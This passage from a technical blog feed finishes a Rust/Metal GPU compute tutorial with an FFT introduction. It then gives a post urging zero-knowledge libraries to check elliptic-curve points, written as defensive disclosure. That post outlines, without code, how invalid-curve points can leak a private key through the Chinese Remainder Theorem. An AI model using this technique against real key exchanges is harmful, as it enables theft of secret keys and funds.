&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let buffer_b = device.new_buffer_with_data(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    unsafe { mem::transmute(w.as_ptr()) },&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    size,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MTLResourceOptions::StorageModeShared,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let buffer_result = device.new_buffer(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    size, &#x2F;&#x2F; length&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    MTLResourceOptions::StorageModeShared, &#x2F;&#x2F; Storage mode&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We’re dealing with two arrays of the &lt;code&gt;u32&lt;&#x2F;code&gt; data type, so the first thing to do is get the size in bytes of both arrays. When using the &lt;code&gt;new_buffer_with_data()&lt;&#x2F;code&gt; method, we’re essentially creating a buffer that copies the data we’re pointing to (the &lt;code&gt;transmute()&lt;&#x2F;code&gt; function reinterprets a &lt;code&gt;*const u32&lt;&#x2F;code&gt; raw pointer as a &lt;code&gt;*const c_void&lt;&#x2F;code&gt;). Finally, we define the storage mode. There are a few modes available for different purposes, but for this case, we use the Shared mode, which simply creates a buffer in the system memory that is accessible from both GPU and CPU. We want &lt;code&gt;buffer_result&lt;&#x2F;code&gt; to be an empty buffer, so we only need to specify its size.&lt;&#x2F;p&gt;
&lt;p&gt;Now, we create the rest of our structures&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let command_queue = device.new_command_queue();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let command_buffer = command_queue.new_command_buffer();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let compute_encoder = command_buffer.new_compute_command_encoder();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.set_compute_pipeline_state(&amp;amp;pipeline);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.set_buffers(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    0, &#x2F;&#x2F; start index&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;[Some(&amp;amp;buffer_a), Some(&amp;amp;buffer_b), Some(&amp;amp;buffer_result)], &#x2F;&#x2F;buffers&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;[0; 3], &#x2F;&#x2F;offset&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Note that each buffer’s index is the start index plus its position in the slice we pass to &lt;code&gt;set_buffers&lt;&#x2F;code&gt; (the last argument holds the byte offsets, zero for all three here). That indexing is what the GPU uses to locate the resources it has to use. This is exactly the same as&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.set_buffer(0, Some(&amp;amp;buffer_a), 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.set_buffer(1, Some(&amp;amp;buffer_b), 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.set_buffer(2, Some(&amp;amp;buffer_result), 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now is the time to set up the grid and threads that will be used in our function:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let grid_size = metal::MTLSize::new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    length, &#x2F;&#x2F;width&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1, &#x2F;&#x2F; height&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1); &#x2F;&#x2F;depth&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let threadgroup_size = metal::MTLSize::new(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    length, &#x2F;&#x2F;width&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1, &#x2F;&#x2F; height&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1); &#x2F;&#x2F;depth;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.dispatch_threads(grid_size, threadgroup_size);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As shown in the snippet above, the grid has a width, height and depth, just like the threadgroup. For this example, we can think of a one-dimensional grid that is our array, with the width being the length of the array. With these sizes we will have one thread per element in our array, which is exactly what we need, considering that each thread will execute a product between two elements. After all that, we simply dispatch the threads to the encoder.&lt;&#x2F;p&gt;
&lt;p&gt;That concludes the encoding and all the resources we need to be able to execute the task on the GPU, so now we can commit.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;compute_encoder.end_encoding();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;command_buffer.commit();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;command_buffer.wait_until_completed();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The &lt;code&gt;wait_until_completed()&lt;&#x2F;code&gt; call is needed before reading the results, but note that the CPU will block until the GPU is finished with the task. This may not be the best solution in some cases, and you may prefer to run another function after the buffer work is done via &lt;code&gt;command_buffer.add_completed_handler()&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;If we want to check that the multiplication was done right in the GPU, we need access to the content of our &lt;code&gt;buffer_result&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let ptr = buffer_result.contents() as *const u32;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let len = buffer_result.length() as usize &#x2F; mem::size_of::&amp;lt;u32&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let slice = unsafe { slice::from_raw_parts(ptr, len) };&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We get the pointer to the memory location of the result buffer and the exact length of the buffer to get all the elements of our array. Using that pointer with the calculated length, we can get a &lt;code&gt;slice&lt;&#x2F;code&gt; with the multiplied elements.&lt;&#x2F;p&gt;
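The same pointer-and-length reconstruction can be tried without any Metal dependency. In this sketch a plain `Vec<u32>` stands in for the shared result buffer; it is an illustration of `slice::from_raw_parts`, not the post’s actual code:

```rust
use std::slice;

fn main() {
    // Stand-in for buffer_result.contents(): a plain Vec whose raw
    // pointer and byte length play the role of the shared buffer.
    let data: Vec<u32> = vec![4, 10, 18];
    let ptr = data.as_ptr();
    let byte_len = data.len() * std::mem::size_of::<u32>();
    // Recover the element count from the byte length, as in the post.
    let len = byte_len / std::mem::size_of::<u32>();
    // Safe here because ptr points to `len` valid, initialized u32s
    // that outlive the reconstructed slice.
    let slice = unsafe { slice::from_raw_parts(ptr, len) };
    assert_eq!(slice, &[4u32, 10, 18][..]);
}
```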
&lt;p&gt;All the code for this example can be found in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;metal_playground&#x2F;tree&#x2F;main&#x2F;examples&#x2F;dotprod&quot;&gt;Metal Playground repository&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;learning-fft&quot;&gt;Learning FFT&lt;&#x2F;h2&gt;
&lt;p&gt;We learned how all the communication with the GPU works, so now we want to see what exactly the FFT algorithm is, and why it is a great candidate to be executed on the GPU.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;dft-and-how-fft-speed-things-up&quot;&gt;DFT and how FFT speeds things up&lt;&#x2F;h3&gt;
&lt;p&gt;To begin, let’s discuss another widely used algorithm in the field of physics that is closely related to FFT - the Discrete Fourier Transform (DFT).&lt;&#x2F;p&gt;
&lt;p&gt;In brief, the DFT algorithm is a mathematical operation that converts a sequence of complex numbers into another sequence of complex numbers. For our specific use case, we are interested in how we can perform faster polynomial multiplication. As multiplying two polynomials involves computing the product of each pair of coefficients and adding the resulting terms with the same degree, it requires $O(N^2)$ operations for two polynomials of degree $N$. We can do better than that.&lt;&#x2F;p&gt;
&lt;p&gt;Our polynomials are typically represented using their coefficients, which we call a coefficient representation. However, we can also represent a polynomial of degree $N$ with a series of points - precisely $N + 1$ points. It turns out that the product of two polynomials in the coefficient representation equals the pointwise multiplication of their point value representations, followed by a transformation of that result back to coefficients. Therefore, all we need is a way to transform the polynomial coefficient representation to a point value representation and then back to the coefficient representation, and that’s exactly what DFT and its inverse (IDFT) do.&lt;&#x2F;p&gt;
&lt;p&gt;The transformation from coefficient form to point value form is known as the evaluation process of the polynomial, while the other way around is known as the interpolation process. However, the problem with DFT is that it does not improve the complexity of the overall computation because it performs all this magic in $O(N^2)$ operations too. This is where FFT comes in handy.&lt;&#x2F;p&gt;
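To see why the coefficient route is quadratic, here is a schoolbook coefficient-form multiplication in plain Rust (a minimal illustration, not code from the post):

```rust
/// Schoolbook polynomial multiplication in coefficient form:
/// every coefficient pair is multiplied, so two degree-N inputs
/// cost O(N^2) operations.
fn poly_mul_naive(a: &[i64], b: &[i64]) -> Vec<i64> {
    let mut out = vec![0i64; a.len() + b.len() - 1];
    for (i, &ai) in a.iter().enumerate() {
        for (j, &bj) in b.iter().enumerate() {
            out[i + j] += ai * bj; // terms of equal degree accumulate
        }
    }
    out
}

fn main() {
    // (1 + 2x) * (3 + 4x) = 3 + 10x + 8x^2
    assert_eq!(poly_mul_naive(&[1, 2], &[3, 4]), vec![3, 10, 8]);
}
```

The FFT route replaces the double loop with evaluate, multiply pointwise, interpolate.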
&lt;p&gt;The Fast Fourier Transform (FFT) algorithm is a computational technique used to efficiently compute the DFT by exploiting its symmetry and periodicity properties. The FFT algorithm uses a divide-and-conquer approach, where the coefficients are recursively divided into smaller sub-polynomials, and the DFT of each sub-polynomial is computed separately.&lt;&#x2F;p&gt;
&lt;p&gt;The key idea behind the FFT algorithm is to decompose the DFT computation into a series of smaller, atomic DFTs, called &lt;em&gt;butterflies&lt;&#x2F;em&gt; , that can be computed efficiently using multiplication and addition operations. The FFT algorithm significantly reduces the number of operations required to compute the DFT from $O(N^2)$ to $O(N*log(N))$, making it a practical solution for large polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;An FFT algorithm can have different characteristics, such as whether it uses a &lt;em&gt;Decimation in Time&lt;&#x2F;em&gt; or &lt;em&gt;Decimation in Frequency&lt;&#x2F;em&gt; approach (which changes the &lt;em&gt;butterfly&lt;&#x2F;em&gt; operation), whether it is &lt;em&gt;radix-n&lt;&#x2F;em&gt; (meaning that it divides the problem by &lt;em&gt;n&lt;&#x2F;em&gt; every time) or &lt;em&gt;mixed-radix&lt;&#x2F;em&gt; (divides the problem into multiple sizes), whether it is &lt;em&gt;ordered&lt;&#x2F;em&gt; or not and which ordering it handles, and a big etcetera.&lt;&#x2F;p&gt;
&lt;p&gt;Since the entire algorithm is based on dividing the problem in two, it’s essential to ensure that the number of coefficients is a power of 2, padding with zero coefficients if necessary.&lt;&#x2F;p&gt;
&lt;p&gt;That is a lot of information so let’s see a basic overview of these ideas:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;AZqXeDk.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h3 id=&quot;working-with-finite-fields&quot;&gt;Working with finite fields&lt;&#x2F;h3&gt;
&lt;p&gt;As mentioned earlier, we explained that the DFT works with complex numbers, but in our case, that won’t be necessary because all of the polynomials and calculations are done in finite fields. A finite field is a mathematical set with a finite number of elements satisfying certain algebraic properties, namely that you can sum, multiply and divide just like you can with regular numbers.&lt;&#x2F;p&gt;
&lt;p&gt;The most common finite fields have a prime number of elements (called the &lt;em&gt;order&lt;&#x2F;em&gt; of the field), so they are also called &lt;strong&gt;prime fields&lt;&#x2F;strong&gt;. Essentially, these are just the integers with the sum and multiplication done modulo the prime order, that is, operations “wrap around” when they go over it. If you’re interested in learning more about modular arithmetic and how it works, you can check out &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Modular_arithmetic&quot;&gt;this resource&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
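As a quick sketch of prime-field arithmetic, here are the basic operations over the toy modulus $p = 7$ (chosen only for illustration); division uses Fermat’s little theorem for the inverse:

```rust
const P: u64 = 7; // a small prime field F_7, for illustration only

fn add(a: u64, b: u64) -> u64 { (a + b) % P }
fn mul(a: u64, b: u64) -> u64 { (a * b) % P }

// Square-and-multiply exponentiation mod P.
fn pow(mut base: u64, mut exp: u64) -> u64 {
    let mut acc = 1;
    base %= P;
    while exp > 0 {
        if exp & 1 == 1 { acc = mul(acc, base); }
        base = mul(base, base);
        exp >>= 1;
    }
    acc
}

// Fermat's little theorem: a^(p-2) mod p is the inverse of a (a != 0).
fn inv(a: u64) -> u64 { pow(a, P - 2) }

fn main() {
    assert_eq!(add(5, 4), 2); // 9 wraps around to 2 mod 7
    assert_eq!(mul(3, 5), 1); // 3 and 5 are inverses mod 7
    assert_eq!(inv(3), 5);
}
```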
&lt;h3 id=&quot;twiddle-factors&quot;&gt;Twiddle factors&lt;&#x2F;h3&gt;
&lt;p&gt;One key aspect to understanding how the FFT algorithm works is the concept of &lt;strong&gt;twiddle factors&lt;&#x2F;strong&gt;. These factors are essential to exploiting the symmetry and periodicity properties of polynomials and enable the evaluation process to be completed with fewer operations. Typically, these factors are referred to as roots of unity - complex numbers that equal 1 when raised to some integer power $n$. As we previously mentioned, since we are working with finite fields, the twiddle factors used in our calculations are not complex numbers, but rather elements within the field.&lt;&#x2F;p&gt;
&lt;p&gt;For example, in the field $\{0,1,2,3,4,5,6\}$ of order $p = 7$, the number $6$ is a $2$nd root of unity, since $6^2 \equiv 1 \pmod 7$.&lt;&#x2F;p&gt;
&lt;p&gt;During the process of implementing FFT, it is crucial to calculate a specific number of roots of unity. To ensure that these calculations are feasible, we require a specific characteristic of the prime fields we use: the prime order must be of the form $2^n k + 1$ with $k$ odd, where $n$ is referred to as the “two-adicity” of the field. This condition guarantees that we can compute all the roots of unity necessary to carry out the FFT algorithm.&lt;&#x2F;p&gt;
&lt;p&gt;Furthermore, when calculating the twiddle factors, we will determine a “primitive root of unity”, which enables us to easily obtain the other roots by raising it to the required powers.&lt;&#x2F;p&gt;
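Putting these pieces together, here is a minimal recursive radix-2 FFT (an NTT) over the toy prime field $\mathbb{F}_{17}$, which has two-adicity 4 and multiplicative generator 3. This is an illustrative sketch only, not the Metal implementation discussed above:

```rust
const P: u64 = 17; // prime of the form 2^4 * k + 1, two-adicity 4

fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1u64;
    b %= P;
    while e > 0 {
        if e & 1 == 1 { acc = acc * b % P; }
        b = b * b % P;
        e >>= 1;
    }
    acc
}

/// Recursive radix-2 NTT: evaluate the polynomial with coefficients
/// `a` (length a power of two) at the powers of `w`, a primitive
/// a.len()-th root of unity mod P.
fn ntt(a: &[u64], w: u64) -> Vec<u64> {
    let n = a.len();
    if n == 1 { return a.to_vec(); }
    // Split into even- and odd-indexed coefficients.
    let even: Vec<u64> = a.iter().step_by(2).copied().collect();
    let odd: Vec<u64> = a.iter().skip(1).step_by(2).copied().collect();
    let w2 = w * w % P;
    let (e, o) = (ntt(&even, w2), ntt(&odd, w2));
    let mut out = vec![0u64; n];
    let mut wk = 1u64; // twiddle factor w^k
    for k in 0..n / 2 {
        let t = wk * o[k] % P; // the butterfly operation
        out[k] = (e[k] + t) % P;
        out[k + n / 2] = (e[k] + P - t) % P;
        wk = wk * w % P;
    }
    out
}

fn main() {
    // 3 generates F_17*, so w = 3^(16/4) = 13 has order 4.
    let w = pow_mod(3, 16 / 4);
    assert_eq!(w, 13);
    // Evaluate p(x) = 1 + 2x + 3x^2 + 4x^3 at 1, w, w^2, w^3.
    let evals = ntt(&[1, 2, 3, 4], w);
    assert_eq!(evals, vec![10, 6, 15, 7]);
}
```

Doing this twice for evaluation, once pointwise, and once inverted for interpolation yields the $O(N \log N)$ polynomial multiplication described above.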
&lt;p&gt;This is just an introduction to the FFT algorithm, so don’t worry if everything isn’t clear yet. There are many intricacies involved in making this algorithm work, and additional calculations are required. To learn more about the FFT algorithm and how it operates, we highly recommend watching this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=h7apO7q16V0&quot;&gt;excellent video&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Metal serves as a great alternative to CUDA on Mac systems, allowing us to perform expensive computations much faster. However, using Metal requires an understanding of its structures and new concepts in addition to the algorithm and code we want to run. We hope this post helped provide some clarity on those concepts.&lt;&#x2F;p&gt;
&lt;p&gt;On another note, we’ve been exploring FFT, one of the greatest and most commonly used algorithms in the ZK world. Some of the mathematical concepts behind FFT are more complex and we want to explain those topics more in depth with more examples. Stay tuned for future posts on this exciting topic to learn how to bring it to code.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Better sane defaults in Zero Knowledge Proofs libraries or how to get the prover&#x27;s private key</title>
          <pubDate>Thu, 09 Mar 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/better-sane-defaults-in-zero-knowledge-proofs-libraries-or-how-to-get-the-prover-private-key/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/better-sane-defaults-in-zero-knowledge-proofs-libraries-or-how-to-get-the-prover-private-key/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/better-sane-defaults-in-zero-knowledge-proofs-libraries-or-how-to-get-the-prover-private-key/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Many ZK libraries allow the creation of pairs of points $(x,y)$ that do not belong to the elliptic curve they are working with when building circuits. Some also do not check that the points belong to the appropriate subgroup, which can lead to vulnerabilities.&lt;&#x2F;p&gt;
&lt;p&gt;The argument being made is that invalid points should not reach a prover. What is more surprising is that we would expect the example code or applications to tackle this issue, but they do not. They are not even giving thought to whether these additional checks are needed or not. Of course, many are worried about benchmarks since adding the constraints would make things slower, but removing the safety net and ignoring some attacks published many years ago is not a good long-term strategy. Even if these checks aren’t part of the prover, they must be somewhere and in many cases they aren’t! If builders take points, like Public Keys, from untrusted users, their system may be compromised, and secret keys may get stolen.&lt;&#x2F;p&gt;
&lt;p&gt;Secret keys may reveal encrypted data or hold access to funds the server may need to operate.&lt;&#x2F;p&gt;
&lt;p&gt;Going back to the checks, as we said before, they may not be needed if the application validates inputs before they reach the prover or if there is a thoughtful analysis of the protocol.&lt;&#x2F;p&gt;
&lt;p&gt;But the first solution, while easy, may lead to censorship. Why should a prover reject a proof generation, saying the input is invalid, without proof that it is invalid?&lt;&#x2F;p&gt;
&lt;p&gt;If there’s another bug in the code, there may be even more issues since a malicious user may have even more ways to scramble the program.&lt;&#x2F;p&gt;
&lt;p&gt;In a practical example, some weeks ago, we found a bug that allows us to &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;dusk-network&#x2F;plonk&#x2F;pull&#x2F;721&#x2F;files&quot;&gt;make the prover believe two points are equal when they are not&lt;&#x2F;a&gt;. Basically, they did not check that, given $A=(x_A,y_A)$ and $B=(x_B,y_B)$, $y_A=y_B$. If they check the points are in the elliptic curve, then necessarily, for the same $x=x_A=x_B$, there are only two possibilities, either $y_A=y_B$ or $y_A=-y_B$, since they have to satisfy the curve’s equation. If there is no such check (because the developer did not deem it necessary), then there are as many values as the order of the prime field for the $y$ coordinate.&lt;&#x2F;p&gt;
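The curve-equation argument is easy to check numerically. This sketch uses a toy curve over $\mathbb{F}_{97}$ with made-up parameters $a = 2$, $b = 3$ (nothing like a real cryptographic curve):

```rust
const P: i64 = 97; // toy prime field, for illustration only

/// Membership check for y^2 = x^3 + a*x + b over F_P.
fn on_curve(x: i64, y: i64, a: i64, b: i64) -> bool {
    (y * y) % P == (x * x * x + a * x + b) % P
}

fn main() {
    let (a, b) = (2, 3);
    // x = 3 gives x^3 + 2x + 3 = 36, so y = 6 and y = 97 - 6 = 91
    // both satisfy the equation...
    assert!(on_curve(3, 6, a, b));
    assert!(on_curve(3, P - 6, a, b));
    // ...and any other y for the same x is rejected by the check.
    assert!(!on_curve(3, 10, a, b));
}
```

Without the membership check, all 97 possible $y$ values would be accepted for $x = 3$, which is exactly the gap the linked fix closes.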
&lt;p&gt;So, even if the protocol is not vulnerable, it is a good idea and engineering practice to keep some extra checks as a &lt;em&gt;“defense in depth”&lt;&#x2F;em&gt; , to make the program more robust in case there are any other bugs that may be used in tandem with the lack of verifications to create exploits.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;a-history-of-attacks-and-vulnerabilities&quot;&gt;A history of attacks and vulnerabilities&lt;&#x2F;h2&gt;
&lt;p&gt;The issue of not checking that a point belongs to a subgroup was first reported in 1997 by Chae Hoon Lim and Pil Joong Lee in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iacr.org&#x2F;archive&#x2F;crypto2000&#x2F;18800131&#x2F;18800131.pdf&quot;&gt;“A Key Recovery Attack on Discrete Log-based Schemes Using a Prime Order Subgroup”&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Meanwhile, the issue of not checking for invalid curves was first reported in the year 2000 by Biehl et al. in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iacr.org&#x2F;archive&#x2F;crypto2000&#x2F;18800131&#x2F;18800131.pdf&quot;&gt;“Differential fault attacks on elliptic curve cryptosystems”&lt;&#x2F;a&gt;. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2017&#x2F;554.pdf&quot;&gt;This article&lt;&#x2F;a&gt; also shows some problems when the code does not verify that points belong to the elliptic curve.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see how this exploit works with an example. We can write elliptic curves in Weierstrass form,&lt;br &#x2F;&gt;
$$ y^2 = x^3 +a x + b $$&lt;br &#x2F;&gt;
One crucial fact is that addition and doubling formulas do not depend on the value $b$. This means that two curves $E$ and $E^\prime$ have the same operations if they only differ in $b$. The curve $E^\prime$ is called an invalid curve relative to $E$, and an attacker may choose an $E^\prime$ with much weaker security.&lt;&#x2F;p&gt;
&lt;p&gt;Suppose an attacker sends some point $Q$ of low order $k$ (the simplest case is $k=2$, which means that $2Q=\mathcal{O}$). If the attacker performs a key exchange with the user $A$ to derive a shared key $K=KDF(sk_A Q)$ and $A$ sends some message $m$ to the attacker, then the attacker can try all $k$ possible values of $K$ and learn $sk \bmod k$.&lt;&#x2F;p&gt;
&lt;p&gt;If the attacker repeats this process several times (using points of different orders, all pairwise coprime), possibly using different invalid curves, he gets a system of congruences.&lt;&#x2F;p&gt;
&lt;p&gt;$sk\equiv sk_1 \pmod{k_1}$&lt;br &#x2F;&gt;
$sk\equiv sk_2 \pmod{k_2}$&lt;br &#x2F;&gt;
$sk\equiv sk_3 \pmod{k_3}$&lt;br &#x2F;&gt;
$sk\equiv sk_4 \pmod{k_4}$&lt;&#x2F;p&gt;
&lt;p&gt;Then, he can use the Chinese Remainder Theorem to reconstruct $sk$, or at least a list of candidates, and solve the remaining problem with a brute-force search. This leads to the attacker learning the secret key and impersonating the server or user, and even signing transactions on behalf of the user (leading to fund stealing, for example).&lt;&#x2F;p&gt;
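The reconstruction step can be sketched with toy numbers (a brute-force CRT over made-up residues, nothing like real key sizes):

```rust
/// Reconstruct a secret from its residues modulo pairwise-coprime
/// small orders, as the invalid-curve attacker does. Brute-search
/// CRT, which is fine for toy moduli like these.
fn crt(residues: &[(u64, u64)]) -> u64 {
    let m: u64 = residues.iter().map(|&(_, k)| k).product();
    (0..m)
        .find(|x| residues.iter().all(|&(r, k)| x % k == r))
        .unwrap()
}

fn main() {
    // Suppose the attacker learned sk mod 3, mod 5, mod 7, mod 11.
    let sk = 1000u64;
    let leaks = [(sk % 3, 3), (sk % 5, 5), (sk % 7, 7), (sk % 11, 11)];
    // 3 * 5 * 7 * 11 = 1155 > sk, so the residues pin sk down uniquely.
    assert_eq!(crt(&leaks), sk);
}
```

Once the product of the orders exceeds the key size, the residues determine the key; otherwise they shrink the brute-force search space.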
&lt;p&gt;This attack extends to protocols whose key exchange diverges from the straightforward original example. For another example, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;link.springer.com&#x2F;chapter&#x2F;10.1007&#x2F;978-3-319-24174-6_21#Sec12&quot;&gt;Practical Invalid Curve Attacks on TLS-ECDH&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Many cryptographic libraries for zero-knowledge-proof applications remove or ignore some basic checks on elliptic curves, which can lead to vulnerabilities. We’re talking with the contributors of the libraries to fix these issues and disclose them.&lt;&#x2F;p&gt;
&lt;p&gt;Even though these attacks have been known for over 20 years, eagerness for performance has led to ignoring them, creating potential problems for developers building on top of these libraries. The question remains: how far are our applications from these kinds of exploits, and how careful will programmers be when handling data that can be poisoned?&lt;&#x2F;p&gt;
&lt;p&gt;Good defaults are important. From our point of view, all the checks should be done by default in libraries, and if they aren’t, this should be made more explicit. Good examples with sane defaults should be part of the libraries. Optimizing by removing checks should be left to highly audited code where skipping those checks gives a real improvement to real users.&lt;&#x2F;p&gt;
&lt;p&gt;Thanks to Diego Kingston and Mauro Toscano from LambdaClass for helping write this.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How we are shaping the future of modular blockchains with  Zero Knowledge Proof, Starknet and Ethereum</title>
          <pubDate>Tue, 07 Mar 2023 00:00:00 +0000</pubDate>
